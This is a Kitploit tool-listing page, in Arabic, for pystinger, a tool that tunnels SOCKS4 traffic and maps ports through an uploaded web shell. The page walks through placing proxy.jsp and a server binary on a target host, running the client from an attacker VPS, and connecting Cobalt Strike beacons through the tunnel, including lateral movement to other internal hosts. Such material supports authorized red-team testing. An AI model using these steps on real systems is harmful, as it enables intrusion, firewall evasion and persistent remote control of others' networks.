Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
pystinger — تجاوز جدار الحماية لتوجيه حركة المرور باستخدام القشرة الويب | Kitploit
أدوات/GitHubGitHub/funnywolf/pystinger
أطر الاستغلالتوليد الحمولةالتهرب من IDS/IPSالحركة الجانبيةاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالفريق الأحمر
GitHubfunnywolf/pystinger

pystinger

تجاوز جدار الحماية لتوجيه حركة المرور باستخدام القشرة الويب

عرض المستودع
1.4k204منذ 4 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

pystinger

الإنجليزية | 简体中文

يقوم Pystinger بتطبيق وكيل SOCK4 وتخطيط المنافذ عبر شل الويب.

يمكن استخدامه مباشرة من قبل metasploit-framework وviper وcobalt strike للجلسات عبر الإنترنت.

تم تطوير Pystinger بلغة python، ويدعم حالياً ثلاثة نصوص وكيل: php وjsp(x) وaspx.

الاستخدام

افترض أن اسم نطاق الخادم هو http://example.com :8080 عنوان IP للشبكة الداخلية للخادم هو 192.168.3.11

وكيل SOCK4

  • قم بتحميل proxy.jsp إلى الخادم الهدف وتأكد من أن http://example.com:8080/proxy.jsp يمكن الوصول إليه، الصفحة تعيد UTF-8
  • قم بتحميل stinger_server.exe إلى الخادم الهدف، في AntSword قم بتشغيل الأمر start D:/XXX/stinger_server.exe لبدء pystinger-server

لا تقم بتشغيل D:/xxx/singer_server.exe مباشرة، سيؤدي ذلك إلى قطع اتصال TCP

  • قم بتشغيل ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 على جهاز VPS الخاص بك
  • سترى المخرجات التالية
root@kitploit:~
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • الآن قمت بتشغيل وكيل socks4a على VPS 127.0.0.1:60000 للشبكة الداخلية لـ example.com.
  • الآن تم تخطيط الخادم الهدف (example.com) 127.0.0.1:60020 إلى VPS 127.0.0.1:60020

اتصال beacon في cobaltstrike لهدف واحد

  • قم بتحميل proxy.jsp إلى الخادم الهدف وتأكد من أن http://example.com:8080/proxy.jsp يمكن الوصول إليه، الصفحة تعيد UTF-8
  • قم بتحميل stinger_server.exe إلى الخادم الهدف، في AntSword قم بتشغيل الأمر start D:/XXX/stinger_server.exe لبدء pystinger-server

لا تقم بتشغيل D:/xxx/singer_server.exe مباشرة، سيؤدي ذلك إلى قطع اتصال TCP

  • قم بتشغيل ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 على جهاز VPS الخاص بك
  • سترى المخرجات التالية
root@kitploit:~
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 127.0.0.1:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • أضف مستمعاً (listener) في cobaltstrike، منفذ المستمع هو 60020 (منفذ Handler/LISTEN في RAT CONFIG من المخرجات)، عنوان المستمع هو 127.0.0.1
  • قم بإنشاء الحمولة (payload)، قم بتحميلها إلى الهدف وشغّلها.

اتصال beacon في cobaltstrike لأهداف متعددة

  • قم بتحميل proxy.jsp إلى الخادم الهدف وتأكد من أن http://example.com:8080/proxy.jsp يمكن الوصول إليه، الصفحة تعيد UTF-8
  • قم بتحميل stinger_server.exe إلى الخادم الهدف، في AntSword قم بتشغيل الأمر start D:/XXX/stinger_server.exe 192.168.3.11 لبدء pystinger-server (192.168.3.11 هو عنوان IP للشبكة الداخلية للهدف)

يمكن تغيير 192.168.3.11 إلى 0.0.0.0

  • قم بتشغيل ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000 على جهاز VPS الخاص بك
  • سترى المخرجات التالية
root@kitploit:~
root@kali:~# ./stinger_client -w http://example.com:8080/proxy.jsp -l 127.0.0.1 -p 60000
2020-01-06 21:12:47,673 - INFO - 619 - Local listen checking ...
2020-01-06 21:12:47,674 - INFO - 622 - Local listen check pass
2020-01-06 21:12:47,674 - INFO - 623 - Socks4a on 127.0.0.1:60000
2020-01-06 21:12:47,674 - INFO - 628 - WEBSHELL checking ...
2020-01-06 21:12:47,681 - INFO - 631 - WEBSHELL check pass
2020-01-06 21:12:47,681 - INFO - 632 - http://example.com:8080/proxy.jsp
2020-01-06 21:12:47,682 - INFO - 637 - REMOTE_SERVER checking ...
2020-01-06 21:12:47,696 - INFO - 644 - REMOTE_SERVER check pass
2020-01-06 21:12:47,696 - INFO - 645 - --- Sever Config ---
2020-01-06 21:12:47,696 - INFO - 647 - client_address_list => []
2020-01-06 21:12:47,696 - INFO - 647 - SERVER_LISTEN => 127.0.0.1:60010
2020-01-06 21:12:47,696 - INFO - 647 - LOG_LEVEL => INFO
2020-01-06 21:12:47,697 - INFO - 647 - MIRROR_LISTEN => 192.168.3.11:60020
2020-01-06 21:12:47,697 - INFO - 647 - mirror_address_list => []
2020-01-06 21:12:47,697 - INFO - 647 - READ_BUFF_SIZE => 51200
2020-01-06 21:12:47,697 - INFO - 673 - TARGET_ADDRESS : 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 677 - SLEEP_TIME : 0.01
2020-01-06 21:12:47,697 - INFO - 679 - --- RAT Config ---
2020-01-06 21:12:47,697 - INFO - 681 - Handler/LISTEN should listen on 127.0.0.1:60020
2020-01-06 21:12:47,697 - INFO - 683 - Payload should connect to 192.168.3.11:60020
2020-01-06 21:12:47,698 - WARNING - 111 - LoopThread start
2020-01-06 21:12:47,703 - WARNING - 502 - socks4a server start on 127.0.0.1:60000
2020-01-06 21:12:47,703 - WARNING - 509 - Socks4a ready to accept
  • أضف مستمعاً (listener) في cobaltstrike، منفذ المستمع هو 60020 (منفذ Handler/LISTEN في RAT CONFIG من المخرجات)، عنوان المستمع هو 192.168.3.11
  • قم بإنشاء الحمولة (payload)، قم بتحميلها إلى الهدف وشغّلها.
  • عند الانتقال الأفقي إلى مضيفين آخرين، يمكنك توجيه الحمولة إلى 192.168.3.11:60020 لجعل beacon متصلاً.

رأس مخصص ووكيل

  • إذا كانت شل الويب بحاجة إلى تكوين cookie أو التفويض، يمكن تكوين رأس الطلب من خلال معامل --header --header "Authorization: XXXXXX,Cookie: XXXXX"

  • إذا كانت شل الويب بحاجة إلى الوصول عبر وكيل، يمكن تعيين الوكيل من خلال --proxy --proxy "socks5:127.0.0.1:1081"

الأدوات ذات الصلة

https://github.com/nccgroup/ABPTTS

https://github.com/sensepost/reGeorg

https://github.com/SECFORCE/Tunna

تم اختباره

stinger_server\stinger_client

  • ويندوز
  • لينكس

proxy.jsp(x)/php/aspx

  • php7.2
  • tomcat7.0
  • iis8.0

سجل التحديثات

2.0 وقت التحديث: 2019-09-29

  • تم نقل خدمة وكيل Socks4 إلى العميل

2.1 وقت التحديث: 2020-01-07

  • دعم اتصال cobaltstrike عبر الإنترنت (تخطيط المنافذ)

التطوير مدعوم من برمجيات jetbrains.
https://www.jetbrains.com/?from=pystinger

تنزيل الأداة